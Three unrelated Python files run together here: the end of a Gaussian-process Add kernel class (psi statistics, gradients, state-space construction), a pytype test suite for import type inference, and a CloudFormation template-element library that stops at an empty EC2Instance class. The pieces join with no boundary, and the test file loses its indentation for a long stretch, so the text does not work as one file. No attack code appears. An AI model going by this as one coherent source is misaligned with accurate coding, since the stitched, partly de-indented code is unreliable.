        target = np.zeros(X.shape)
        [target.__iadd__(p.gradients_X_diag(dL_dKdiag, X)) for p in self.parts]
        return target

    def gradients_XX(self, dL_dK, X, X2):
        """Sum of the parts' second derivatives wrt X."""
        if X2 is None:
            target = np.zeros((X.shape[0], X.shape[0], X.shape[1], X.shape[1]))
        else:
            target = np.zeros((X.shape[0], X2.shape[0], X.shape[1], X.shape[1]))
        [target.__iadd__(p.gradients_XX(dL_dK, X, X2)) for p in self.parts]
        return target

    def gradients_XX_diag(self, dL_dKdiag, X):
        """Sum of the parts' diagonal second derivatives wrt X."""
        target = np.zeros(X.shape+(X.shape[1],))
        [target.__iadd__(p.gradients_XX_diag(dL_dKdiag, X)) for p in self.parts]
        return target

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def psi0(self, Z, variational_posterior):
        if not self._exact_psicomp: return Kern.psi0(self, Z, variational_posterior)
        return reduce(np.add, (p.psi0(Z, variational_posterior) for p in self.parts))

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def psi1(self, Z, variational_posterior):
        if not self._exact_psicomp: return Kern.psi1(self, Z, variational_posterior)
        return reduce(np.add, (p.psi1(Z, variational_posterior) for p in self.parts))

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def psi2(self, Z, variational_posterior):
        """Summed psi2 statistic plus the pairwise cross terms between parts."""
        if not self._exact_psicomp: return Kern.psi2(self, Z, variational_posterior)
        psi2 = reduce(np.add, (p.psi2(Z, variational_posterior) for p in self.parts))
        # compute the "cross" terms
        from .static import White, Bias
        from .rbf import RBF
        from .linear import Linear
        for p1, p2 in itertools.combinations(self.parts, 2):
            # white doesn't combine with anything
            if isinstance(p1, White) or isinstance(p2, White):
                pass
            # rbf/linear X bias
            elif isinstance(p1, Bias) and isinstance(p2, (RBF, Linear)):
                tmp = p2.psi1(Z, variational_posterior).sum(axis=0)
                psi2 += p1.variance * (tmp[:, None] + tmp[None, :])
            elif isinstance(p2, Bias) and isinstance(p1, (RBF, Linear)):
                tmp = p1.psi1(Z, variational_posterior).sum(axis=0)
                psi2 += p2.variance * (tmp[:, None] + tmp[None, :])
            elif isinstance(p2, (RBF, Linear)) and isinstance(p1, (RBF, Linear)):
                assert np.intersect1d(p1._all_dims_active, p2._all_dims_active).size == 0, "only non overlapping kernel dimensions allowed so far"
                tmp1 = p1.psi1(Z, variational_posterior)
                tmp2 = p2.psi1(Z, variational_posterior)
                psi2 += np.einsum('nm,no->mo', tmp1, tmp2) + np.einsum('nm,no->mo', tmp2, tmp1)
            else:
                raise NotImplementedError("psi2 cannot be computed for this kernel")
        return psi2

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def psi2n(self, Z, variational_posterior):
        """Per-data-point variant of psi2 (no sum over n), cross terms included."""
        if not self._exact_psicomp: return Kern.psi2n(self, Z, variational_posterior)
        psi2 = reduce(np.add, (p.psi2n(Z, variational_posterior) for p in self.parts))
        # compute the "cross" terms
        from .static import White, Bias
        from .rbf import RBF
        from .linear import Linear
        for p1, p2 in itertools.combinations(self.parts, 2):
            # white doesn't combine with anything
            if isinstance(p1, White) or isinstance(p2, White):
                pass
            # rbf/linear X bias
            elif isinstance(p1, Bias) and isinstance(p2, (RBF, Linear)):
                tmp = p2.psi1(Z, variational_posterior)
                psi2 += p1.variance * (tmp[:, :, None] + tmp[:, None, :])
            elif isinstance(p2, Bias) and isinstance(p1, (RBF, Linear)):
                tmp = p1.psi1(Z, variational_posterior)
                psi2 += p2.variance * (tmp[:, :, None] + tmp[:, None, :])
            elif isinstance(p2, (RBF, Linear)) and isinstance(p1, (RBF, Linear)):
                assert np.intersect1d(p1._all_dims_active, p2._all_dims_active).size == 0, "only non overlapping kernel dimensions allowed so far"
                tmp1 = p1.psi1(Z, variational_posterior)
                tmp2 = p2.psi1(Z, variational_posterior)
                psi2 += np.einsum('nm,no->nmo', tmp1, tmp2) + np.einsum('nm,no->nmo', tmp2, tmp1)
            else:
                raise NotImplementedError("psi2 cannot be computed for this kernel")
        return psi2

    def update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Propagate psi-statistic gradients to every part, folding the psi2
        cross terms into an effective dL_dpsi1 for each part."""
        tmp = dL_dpsi2.sum(0) + dL_dpsi2.sum(1) if len(dL_dpsi2.shape) == 2 else dL_dpsi2.sum(2) + dL_dpsi2.sum(1)
        if not self._exact_psicomp: return Kern.update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
        from .static import White, Bias
        for p1 in self.parts:
            # compute the effective dL_dpsi1. Extra terms appear because of
            # the cross terms in psi2!
            eff_dL_dpsi1 = dL_dpsi1.copy()
            for p2 in self.parts:
                if p2 is p1:
                    continue
                if isinstance(p2, White):
                    continue
                elif isinstance(p2, Bias):
                    eff_dL_dpsi1 += tmp * p2.variance
                else:  # TODO: Careful, not correct for overlapping _all_dims_active
                    eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
            p1.update_gradients_expectations(dL_dpsi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)

    def gradients_Z_expectations(self, dL_psi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Gradient of the psi statistics wrt the inducing inputs Z."""
        tmp = dL_dpsi2.sum(0) + dL_dpsi2.sum(1) if len(dL_dpsi2.shape) == 2 else dL_dpsi2.sum(2) + dL_dpsi2.sum(1)
        if not self._exact_psicomp: return Kern.gradients_Z_expectations(self, dL_psi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
        from .static import White, Bias
        target = np.zeros(Z.shape)
        for p1 in self.parts:
            # compute the effective dL_dpsi1. extra terms appear because of
            # the cross terms in psi2!
            eff_dL_dpsi1 = dL_dpsi1.copy()
            for p2 in self.parts:
                if p2 is p1:
                    continue
                if isinstance(p2, White):
                    continue
                elif isinstance(p2, Bias):
                    eff_dL_dpsi1 += tmp * p2.variance
                else:
                    eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
            target += p1.gradients_Z_expectations(dL_psi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)
        return target

    def gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
        """Gradient of the psi statistics wrt the variational posterior parameters."""
        tmp = dL_dpsi2.sum(0) + dL_dpsi2.sum(1) if len(dL_dpsi2.shape) == 2 else dL_dpsi2.sum(2) + dL_dpsi2.sum(1)
        if not self._exact_psicomp: return Kern.gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior)
        from .static import White, Bias
        target_grads = [np.zeros(v.shape) for v in variational_posterior.parameters]
        # FIX: iterate self.parts (the subkernels) as in
        # update_gradients_expectations and gradients_Z_expectations above;
        # this method used self.parameters, inconsistent with its siblings.
        for p1 in self.parts:
            # compute the effective dL_dpsi1. extra terms appear because of
            # the cross terms in psi2!
            eff_dL_dpsi1 = dL_dpsi1.copy()
            for p2 in self.parts:
                if p2 is p1:
                    continue
                if isinstance(p2, White):
                    continue
                elif isinstance(p2, Bias):
                    eff_dL_dpsi1 += tmp * p2.variance
                else:
                    eff_dL_dpsi1 += tmp * p2.psi1(Z, variational_posterior)
            grads = p1.gradients_qX_expectations(dL_dpsi0, eff_dL_dpsi1, dL_dpsi2, Z, variational_posterior)
            [np.add(target_grads[i], grads[i], target_grads[i]) for i in range(len(grads))]
        return target_grads

    def input_sensitivity(self, summarize=True):
        """Sensitivity per input dimension; summed over parts when summarize=True."""
        if summarize:
            i_s = np.zeros((self.input_dim))
            for k in self.parts:
                i_s[k._all_dims_active] += k.input_sensitivity(summarize)
            return i_s
        else:
            return super(Add, self).input_sensitivity(summarize)

    def sde_update_gradient_full(self, gradients):
        """
        Update gradient in the order in which parameters are represented in the
        kernel
        """
        part_start_param_index = 0
        for p in self.parts:
            if not p.is_fixed:
                part_param_num = len(p.param_array)  # number of parameters in the part
                p.sde_update_gradient_full(gradients[part_start_param_index:(part_start_param_index + part_param_num)])
                part_start_param_index += part_param_num

    def sde(self):
        """
        Support adding kernels for sde representation

        Builds the block-diagonal state-space model of the sum from the
        parts' individual (F, L, Qc, H, Pinf, P0, dF, dQc, dPinf, dP0)
        representations, padding the derivative tensors so each part's
        derivatives occupy their own block.
        """
        import scipy.linalg as la
        F = None
        L = None
        Qc = None
        H = None
        Pinf = None
        P0 = None
        dF = None
        dQc = None
        dPinf = None
        dP0 = None
        n = 0   # total state dimension
        nq = 0  # total noise dimension
        nd = 0  # total number of parameters (derivative slices)
        # Assign models
        for p in self.parts:
            (Ft, Lt, Qct, Ht, Pinft, P0t, dFt, dQct, dPinft, dP0t) = p.sde()
            F = la.block_diag(F, Ft) if (F is not None) else Ft
            L = la.block_diag(L, Lt) if (L is not None) else Lt
            Qc = la.block_diag(Qc, Qct) if (Qc is not None) else Qct
            H = np.hstack((H, Ht)) if (H is not None) else Ht
            Pinf = la.block_diag(Pinf, Pinft) if (Pinf is not None) else Pinft
            P0 = la.block_diag(P0, P0t) if (P0 is not None) else P0t
            if dF is not None:
                dF = np.pad(dF, ((0, dFt.shape[0]), (0, dFt.shape[1]), (0, dFt.shape[2])),
                            'constant', constant_values=0)
                dF[-dFt.shape[0]:, -dFt.shape[1]:, -dFt.shape[2]:] = dFt
            else:
                dF = dFt
            if dQc is not None:
                dQc = np.pad(dQc, ((0, dQct.shape[0]), (0, dQct.shape[1]), (0, dQct.shape[2])),
                             'constant', constant_values=0)
                dQc[-dQct.shape[0]:, -dQct.shape[1]:, -dQct.shape[2]:] = dQct
            else:
                dQc = dQct
            if dPinf is not None:
                dPinf = np.pad(dPinf, ((0, dPinft.shape[0]), (0, dPinft.shape[1]), (0, dPinft.shape[2])),
                               'constant', constant_values=0)
                dPinf[-dPinft.shape[0]:, -dPinft.shape[1]:, -dPinft.shape[2]:] = dPinft
            else:
                dPinf = dPinft
            if dP0 is not None:
                dP0 = np.pad(dP0, ((0, dP0t.shape[0]), (0, dP0t.shape[1]), (0, dP0t.shape[2])),
                             'constant', constant_values=0)
                dP0[-dP0t.shape[0]:, -dP0t.shape[1]:, -dP0t.shape[2]:] = dP0t
            else:
                dP0 = dP0t
            n += Ft.shape[0]
            nq += Qct.shape[0]
            nd += dFt.shape[2]
        assert (F.shape[0] == n and F.shape[1] == n), "SDE add: Check of F Dimensions failed"
        assert (L.shape[0] == n and L.shape[1] == nq), "SDE add: Check of L Dimensions failed"
        assert (Qc.shape[0] == nq and Qc.shape[1] == nq), "SDE add: Check of Qc Dimensions failed"
        assert (H.shape[0] == 1 and H.shape[1] == n), "SDE add: Check of H Dimensions failed"
        assert (Pinf.shape[0] == n and Pinf.shape[1] == n), "SDE add: Check of Pinf Dimensions failed"
        assert (P0.shape[0] == n and P0.shape[1] == n), "SDE add: Check of P0 Dimensions failed"
        assert (dF.shape[0] == n and dF.shape[1] == n and dF.shape[2] == nd), "SDE add: Check of dF Dimensions failed"
        assert (dQc.shape[0] == nq and dQc.shape[1] == nq and dQc.shape[2] == nd), "SDE add: Check of dQc Dimensions failed"
        assert (dPinf.shape[0] == n and dPinf.shape[1] == n and dPinf.shape[2] == nd), "SDE add: Check of dPinf Dimensions failed"
        assert (dP0.shape[0] == n and dP0.shape[1] == n and dP0.shape[2] == nd), "SDE add: Check of dP0 Dimensions failed"
        return (F, L, Qc, H, Pinf, P0, dF, dQc, dPinf, dP0)
| |
"""Tests for import."""
import unittest
from pytype import utils
from pytype.tests import test_inference
class ImportTest(test_inference.InferenceTest):
"""Tests for import."""
def testBasicImport(self):
with self.Infer("""\
import sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
""")
def testBasicImport2(self):
with self.Infer("""\
import bad_import
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
bad_import: ?
""")
def testFromImportSmoke(self):
self.assert_ok("""\
from sys import exit
from path.to.module import bar, baz
""")
def testPathImport(self):
with utils.Tempdir() as d:
d.create_file("path/to/my_module.pytd",
"def qqsv() -> str")
with self.Infer("""\
import path.to.my_module
def foo():
return path.to.my_module.qqsv()
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
path: module
def foo() -> str
""")
def testPathImport2(self):
with utils.Tempdir() as d:
d.create_file("path/to/my_module.pytd",
"def qqsv() -> str")
with self.Infer("""\
import nonexistant_path.to.my_module
def foo():
return path.to.my_module.qqsv()
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
nonexistant_path: ?
def foo() -> ?
""")
def testImportAll(self):
self.assert_ok("""\
from module import *
from path.to.module import *
""")
def testAssignMember(self):
self.assert_ok("""\
import sys
sys.path = []
""")
def testReturnModule(self):
with self.Infer("""
import sys
def f():
return sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> module
""")
def testMatchModule(self):
with self.Infer("""
import sys
def f():
if getattr(sys, "foobar"):
return {sys: sys}.keys()[0]
else:
return sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> module
""")
def testSys(self):
with self.Infer("""
import sys
def f():
return sys.path
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> list<str>
""")
def testFromSysImport(self):
with self.Infer("""
from sys import path
def f():
return path
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
path: list<str>
def f() -> list<str>
""")
def testImportSys2(self):
with self.Infer("""
import sys
import bad_import
def f():
return sys.stderr
def g():
return sys.maxint
def h():
return sys.getrecursionlimit()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
bad_import: ?
sys: module
def f() -> file
def g() -> int
def h() -> int
""")
def testStdlib(self):
with self.Infer("""
import StringIO
def f():
return StringIO.StringIO().isatty()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
StringIO: module
def f() -> bool
""")
# TODO(pludemann): Implement import of .py
# This test has never worked, except in the sense that it didn't fail.
# We need to define how import works if there's a .py file; also how it
# works if there are both a .py file and a .pytd file.
@unittest.skip("Broken - def g() -> long list of types")
def testImportPy(self):
with utils.Tempdir() as d:
d.create_file("other_file.py", """
def f():
return 3.14159
""")
d.create_file("main.py", """
from other_file import f
def g():
return f()
""")
ty = self.InferFromFile(
filename=d["main.py"],
# Note that .pytd is the extension for pythonpath and not .py, so
# "import" will fail to find other_file.py
pythonpath=[d.path])
# TODO(kramm): Do more testing here once pludemann@ has implemented logic
# for actually using pythonpath. Also below.
self.assertTypesMatchPytd(ty, """
def g() -> float
""")
def testImportPytd(self):
with utils.Tempdir() as d:
d.create_file("other_file.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from other_file import f
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
""")
def testImportPytd2(self):
with utils.Tempdir() as d:
d.create_file("other_file.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from other_file import f
def g():
return f()
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> int
""")
def testImportDirectory(self):
with utils.Tempdir() as d:
d.create_file("sub/other_file.pytd", "def f() -> int")
d.create_file("sub/bar/baz.pytd", "def g() -> float")
d.create_file("main.py", """
from sub import other_file
import sub.bar.baz
from sub.bar.baz import g
def h():
return other_file.f()
def i():
return g()
def j():
return sub.bar.baz.g()
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
other_file: module
g: function
sub: module # from 'import sub.bar.baz'
def h() -> int
def i() -> float
def j() -> float
""")
def testImportInit(self):
with utils.Tempdir() as d:
d.create_file("sub/__init__.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from sub import f
def g():
return f()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> int
""")
def testImportName(self):
with utils.Tempdir() as d:
d.create_file("foo.pytd", """
class A:
pass
def f() -> A
""")
d.create_file("main.py", """
from foo import f
def g():
return f()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> foo.A
""")
def testDeepDependency(self):
with utils.Tempdir() as d:
d.create_file("foo.pytd", "x: bar.Bar")
d.create_file("bar.pytd", """
class Bar:
def bar(self) -> int
""")
d.create_file("main.py", """
from foo import x
def f():
return x.bar()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
x: bar.Bar
def f() -> int
""")
def testRelativeImport(self):
with utils.Tempdir() as d:
d.create_file("foo/baz.pytd", """x: int""")
d.create_file("foo/bar.py", """
from . import baz
def f():
return baz.x
""")
ty = self.InferFromFile(filename=d["foo/bar.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
baz: module
def f() -> int
""")
def testDotDot(self):
with utils.Tempdir() as d:
d.create_file("foo/baz.pytd", """x: int""")
d.create_file("foo/deep/bar.py", """
from .. import baz
def f():
return baz.x
""")
ty = self.InferFromFile(filename=d["foo/deep/bar.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
baz: module
def f() -> int
""")
def testFileImport1(self):
with utils.Tempdir() as d:
d.create_file("path/to/some/module.pytd",
"def foo(x:int) -> str")
with self.Infer("""\
import path.to.some.module
def my_foo(x):
return path.to.some.module.foo(x)
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
path: module
def my_foo(x:bool or int) -> str
""")
  def testFileImport2(self):
    # "from path.to.some import module" binds the leaf name instead of
    # the top-level package.
    with utils.Tempdir() as d:
      d.create_file("path/to/some/module.pytd",
                    "def foo(x:int) -> str")
      with self.Infer("""\
        from path.to.some import module
        def my_foo(x):
          return module.foo(x)
      """, deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
        self.assertTypesMatchPytd(ty, """
          module: module
          def my_foo(x:bool or int) -> str
        """)
  def testSolveForImported(self):
    # Solving unknowns should match x against types from an imported
    # module: anything with read() (file or StringIO.StringIO).
    with self.Infer("""\
      import StringIO
      def my_foo(x):
        return x.read()
    """, deep=True, solve_unknowns=True) as ty:
      self.assertTypesMatchPytd(ty, """
        StringIO: module
        def my_foo(x:file or StringIO.StringIO) -> str
      """)
  def testImportBuiltins(self):
    # "__builtin__" imported under an alias still resolves its members
    # to their fully qualified builtin types.
    with self.Infer("""\
      import __builtin__ as builtins
      def f():
        return builtins.int()
    """, deep=True, solve_unknowns=True) as ty:
      self.assertTypesMatchPytd(ty, """
        builtins: module
        def f() -> __builtin__.int
      """)
  def testImportedMethodAsClassAttribute(self):
    # A function taken from a module and stored as a class attribute is
    # typed as a plain function.
    with self.Infer("""
      import os
      class Foo(object):
        killpg = os.killpg
    """, deep=True, solve_unknowns=True) as ty:
      self.assertTypesMatchPytd(ty, """
        os: module
        class Foo:
          killpg: function
      """)
  def testMatchAgainstImported(self):
    # Unknown arguments should be matched against classes imported from a
    # pytd file, including a locally defined subclass of an imported class.
    with utils.Tempdir() as d:
      d.create_file("foo.pytd", """
        class Foo:
          pass
        class Bar:
          def f1(self, x: Foo) -> Baz
        class Baz:
          pass
      """)
      with self.Infer("""\
        import foo
        def f(x, y):
          return x.f1(y)
        def g(x):
          return x.f1(foo.Foo())
        class FooSub(foo.Foo):
          pass
        def h(x):
          return x.f1(FooSub())
      """, deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
        self.assertTypesMatchPytd(ty, """
          foo: module
          def f(x:foo.Bar, y:foo.Foo) -> foo.Baz
          def g(x:foo.Bar) -> foo.Baz
          def h(x:foo.Bar) -> foo.Baz
          class FooSub(foo.Foo):
            pass
        """)
  def testImportedConstants(self):
    # Module-level and class-level constants from a pytd file keep their
    # declared types, whether read through the class or an instance.
    with utils.Tempdir() as d:
      d.create_file("module.pytd", """
        x: int
        class Foo:
          x: float
      """)
      with self.Infer("""\
        import module
        def f():
          return module.x
        def g():
          return module.Foo().x
        def h():
          return module.Foo.x
      """, deep=True, solve_unknowns=False, pythonpath=[d.path]) as ty:
        self.assertTypesMatchPytd(ty, """
          module: module
          def f() -> int
          def g() -> float
          def h() -> float
        """)
if __name__ == "__main__":
  # Delegate to the shared test runner when this module is executed directly.
  test_inference.main()
| |
'''
Basic definition of the elements available for building CloudFormation stack templates
@author: David Losada Carballo <david@tuxpiper.com>
'''
import copy
class CfnSimpleExpr(object):
    """
    Wraps a literal CloudFormation expression (e.g. { "Ref" : "AWS::StackName" }).
    Expansion simply hands the wrapped value back unchanged.
    """
    def __init__(self, definition):
        self.definition = definition

    def cfn_expand(self):
        # The definition is already in its final CloudFormation form.
        return self.definition

    def __repr__(self):
        return "<CfnSimpleExpr: '{0}'>".format(self.definition)
class CfnGetAttrExpr(object):
    """Expands to CloudFormation's Fn::GetAtt over an element's attribute."""
    def __init__(self, el, attr):
        self.el = el
        self.attr = attr

    def cfn_expand(self):
        # Resolve the element's template name lazily, at expansion time.
        target = [self.el.ref_name, self.attr]
        return CfnSimpleExpr({"Fn::GetAtt" : target})

    def __repr__(self):
        return "<CfnGetAttrExpr: '%s', '%s'>" % (self.el.ref_name, self.attr)
class GetRefNameExpr(object):
    """
    An expression that returns the name of the given element
    """
    def __init__(self, element):
        self.element = element

    def cfn_expand(self):
        # The element's template name is used verbatim (a bare string).
        return self.element.ref_name

    def __repr__(self):
        # BUG FIX: the format string had two '%s' placeholders but a single,
        # non-tuple argument, so repr() raised TypeError.
        return "<GetRefNameExpr: '%s'>" % self.element.ref_name
class CfnRegionExpr(object):
    """Expands to the AWS::Region pseudo-parameter."""
    def cfn_expand(self):
        return { "Ref" : "AWS::Region" }

    def resolve(self, stack=None, element=None, cfn_env=None):
        # 'dict.has_key' was removed in Python 3; 'in' behaves identically
        # on Python 2, so this is a pure compatibility fix.
        if "region" in cfn_env:
            return cfn_env["region"]
        # Falls through to an implicit None when no region is known,
        # preserving the original behaviour.

    def __repr__(self):
        return "<CfnRegionExpr>"
class CfnSelectExpr(object):
    """Expands to Fn::Select, expanding both operands first if needed."""
    def __init__(self, listOfObjects, index):
        self.listOfObjects = listOfObjects
        self.index = index

    def cfn_expand(self):
        def _expand(value):
            # Operands may themselves be expressions; expand them in place.
            if hasattr(value, "cfn_expand"):
                return value.cfn_expand()
            return value
        selected = [_expand(self.index), _expand(self.listOfObjects)]
        return CfnSimpleExpr({"Fn::Select": selected})
class MappingLookupExpr(object):
    """
    An expression that performs lookup in a mapping
    """
    def __init__(self, mapping, key1, key2):
        self.mapping = mapping
        self.key1 = key1
        self.key2 = key2

    def cfn_expand(self):
        return {"Fn::FindInMap" : [ self.mapping.ref_name, self.key1, self.key2 ]}

    def resolve(self, stack=None, element=None, cfn_env=None):
        # Keys may themselves be resolvable expressions; resolve them first.
        first, second = self.key1, self.key2
        if hasattr(first, "resolve"):
            first = first.resolve(stack, element, cfn_env)
        if hasattr(second, "resolve"):
            second = second.resolve(stack, element, cfn_env)
        return self.mapping.el_attrs[first][second]

    def __repr__(self):
        return "<MappingLookupExpr: '%s', '%s', '%s'>" % (
            self.mapping.ref_name, self.key1, self.key2)
def get_ref_name(element):
    """Return an expression that expands to the element's template name."""
    return GetRefNameExpr(element)
class CloudCastHelperExpr(object):
    """
    Helper expressions are interpreted and transformed by resources before
    passing onto the CloudFormation template.
    """
    def resolve(self, stack, element):
        # Subclasses must compute self.resolvedTo here.
        raise NotImplementedError("This is for subclasses to sort out")

    def cfn_expand(self):
        # resolve() must have run first and populated resolvedTo.
        return self.resolvedTo
class ThisResourceExpr(CloudCastHelperExpr):
    """Resolves to the name of the resource containing the expression."""
    def resolve(self, stack=None, element=None, cfn_env=None):
        # Capture the containing element's template name for cfn_expand().
        self.resolvedTo = element.ref_name

    def __repr__(self):
        return "<ThisResourceExpr>"
class StackElement(object):
    """
    Class for elements that appear in the stack definition, this includes
    parameters, resources, outputs and mappings
    """
    def __init__(self, **kwargs):
        """
        Creates the stack element, copying the provided properties.
        Attributes whose value is None are dropped.
        """
        self.ref_name = None    # Reference name in template module
        self.ref_count = 0      # Only one reference allowed
        self.dont_dump = False  # Avoids dumping the element when transforming
        # Filter out any attributes with value None.  The dict comprehension
        # replaces the old tuple-unpacking lambda over .iteritems(), which is
        # a SyntaxError on Python 3 (tuple parameters and .iteritems() were
        # both removed); behaviour is identical on Python 2.7.
        self.el_attrs = dict((k, v) for k, v in kwargs.items() if v is not None)

    def contents(self, stack):
        """Return the (name, attributes) pair to dump into the template."""
        return (self.ref_name, self.el_attrs)

    def cfn_expand(self):
        """
        Returns AWS CloudFormation idiom for referencing the element.

        NOTE(review): unlike the other cfn_expand implementations, this
        returns a zero-argument lambda rather than the expression itself;
        callers appear to rely on the deferred form, so it is kept — confirm
        before changing.
        """
        if self.ref_name is None:
            raise Exception("Tried to get a reference when I still don't have a name!")
        return lambda: CfnSimpleExpr({ "Ref" : self.ref_name })

    def __getattribute__(self, name):
        """
        Capture some attribute references.
        - 'name' returns an object that, when evaluated, will resolve to this
          resource's name within the stack template
        """
        if name == "name":
            return lambda: self.ref_name
        else:
            return super(StackElement, self).__getattribute__(name)
class Parameter(StackElement):
    """A parameter entry of the stack template."""
    def __init__(self, **kwargs):
        # Nothing parameter-specific yet; defer to the common element setup.
        super(Parameter, self).__init__(**kwargs)
class Mapping(StackElement):
    """
    Stack mapping.
    """
    def __init__(self, mapping):
        super(Mapping, self).__init__(**mapping)
        self.is_used = False  # Flipped once a lookup is created against it.

    def find(self, key1, key2):
        """Return a lookup expression into this mapping; marks it used."""
        self.is_used = True
        return MappingLookupExpr(self, key1, key2)
class Output(StackElement):
    """
    Stack output.  Behaves exactly like a generic stack element; the subclass
    exists so the template builder can tell outputs apart from other kinds.
    """
    pass
class Resource(StackElement):
    """
    Stack resource
    """
    @classmethod
    def ThisName(cls):
        """
        Returns a static expression that, when evaluated, will be
        resolved to the CloudFormation name of the resource where this
        expression is used. This will be just a string for CloudFormation and,
        thus, it won't be failing because of recursive element dependencies.
        """
        return ThisResourceExpr()

    def __init__(self, resource_type, **kwargs):
        self.resource_type = resource_type
        # If 'Properties' not specified, all kwargs are properties except
        # the well-known top-level resource attributes, which are element
        # attributes of their own.  ('dict.has_key' was removed in Python 3;
        # 'in' / pop-with-default behave identically on Python 2.)
        if "Properties" not in kwargs:
            properties = copy.copy(kwargs)
            metadata = properties.pop('Metadata', None)
            depends_on = properties.pop('DependsOn', None)
            deletion_policy = properties.pop('DeletionPolicy', None)
            update_policy = properties.pop('UpdatePolicy', None)
            StackElement.__init__(self,
                Type=resource_type,
                Metadata=metadata,
                DependsOn=depends_on,
                Properties=properties,
                DeletionPolicy = deletion_policy,
                UpdatePolicy = update_policy
            )
        else:
            StackElement.__init__(self,
                Type=resource_type,
                **copy.copy(kwargs))

    def add_dependency(self, dep):
        """Append dep to this resource's DependsOn list, creating it if needed."""
        # BUG FIX: this previously checked 'self.el_props', an attribute that
        # does not exist, so any call on a resource that already had a
        # DependsOn entry raised AttributeError.
        if "DependsOn" not in self.el_attrs:
            self.el_attrs["DependsOn"] = [ dep ]
        else:
            self.el_attrs["DependsOn"].append(dep)

    def add_property(self, key, value):
        """Set a single entry inside the resource's Properties block."""
        if 'Properties' not in self.el_attrs:
            self.el_attrs['Properties'] = {}
        self.el_attrs['Properties'][key] = value

    def get_property(self, key, default=None):
        """Read an entry from Properties; return default when absent."""
        if 'Properties' not in self.el_attrs or key not in self.el_attrs['Properties']:
            return default
        return self.el_attrs['Properties'][key]

    def add_metadata_key(self, key, value):
        """Set a single entry inside the resource's Metadata block."""
        if 'Metadata' not in self.el_attrs:
            self.el_attrs['Metadata'] = {}
        self.el_attrs['Metadata'][key] = value

    def get_metadata_key(self, key, default=None):
        """Read an entry from Metadata; return default when absent."""
        if 'Metadata' not in self.el_attrs or key not in self.el_attrs['Metadata']:
            return default
        return self.el_attrs['Metadata'][key]

    def contents(self, stack):
        # Find and resolve helper expressions before dumping the contents
        from cloudcast._utils import walk_values
        for value in walk_values(self.el_attrs):
            if isinstance(value, CloudCastHelperExpr):
                value.resolve(stack, self)
        # Dump the contents
        return (self.ref_name, self.el_attrs)

    def __getitem__(self, key):
        """
        [] operator for a resource element is equivalent to calling
        cloudformation's "Fn::GetAtt"
        """
        return CfnGetAttrExpr(self, key)

    def __repr__(self):
        return "<Resource('%s')>" % self.ref_name
class LaunchableResource(Resource):
    """
    A resource that launches instances and may carry an instance software
    configuration manager ("iscm") specification.
    """
    def __init__(self, restype, **kwargs):
        self.iscm = None
        # 'dict.has_key' was removed in Python 3; 'in' works on both 2 and 3.
        if "iscm" in kwargs:
            # If an SCM spec is given, build it
            from cloudcast.iscm import ISCM
            if isinstance(kwargs["iscm"], ISCM):
                self.iscm = kwargs["iscm"]
            else:
                self.iscm = ISCM(kwargs["iscm"])
            kwargs.pop("iscm")
        Resource.__init__(self, restype, **kwargs)

    def contents(self, stack):
        # Before "spilling the beans", let the iscm update this element
        if self.iscm is not None:
            self.iscm.apply_to(self)
        # Proceed with dumping the contents
        return Resource.contents(self, stack)

    def is_buildable(self):
        """True when an iscm is present and reports itself buildable."""
        if self.iscm is None:
            return False
        return self.iscm.is_buildable()

    def resolve_ami(self, **kwargs):
        """Return the ImageId property, resolving it if it is an expression."""
        ami = self.el_attrs["Properties"]["ImageId"]
        if hasattr(ami, "resolve"):
            ami = ami.resolve(stack=None, element=self, cfn_env=kwargs)
        return ami
class EC2Instance(LaunchableResource):
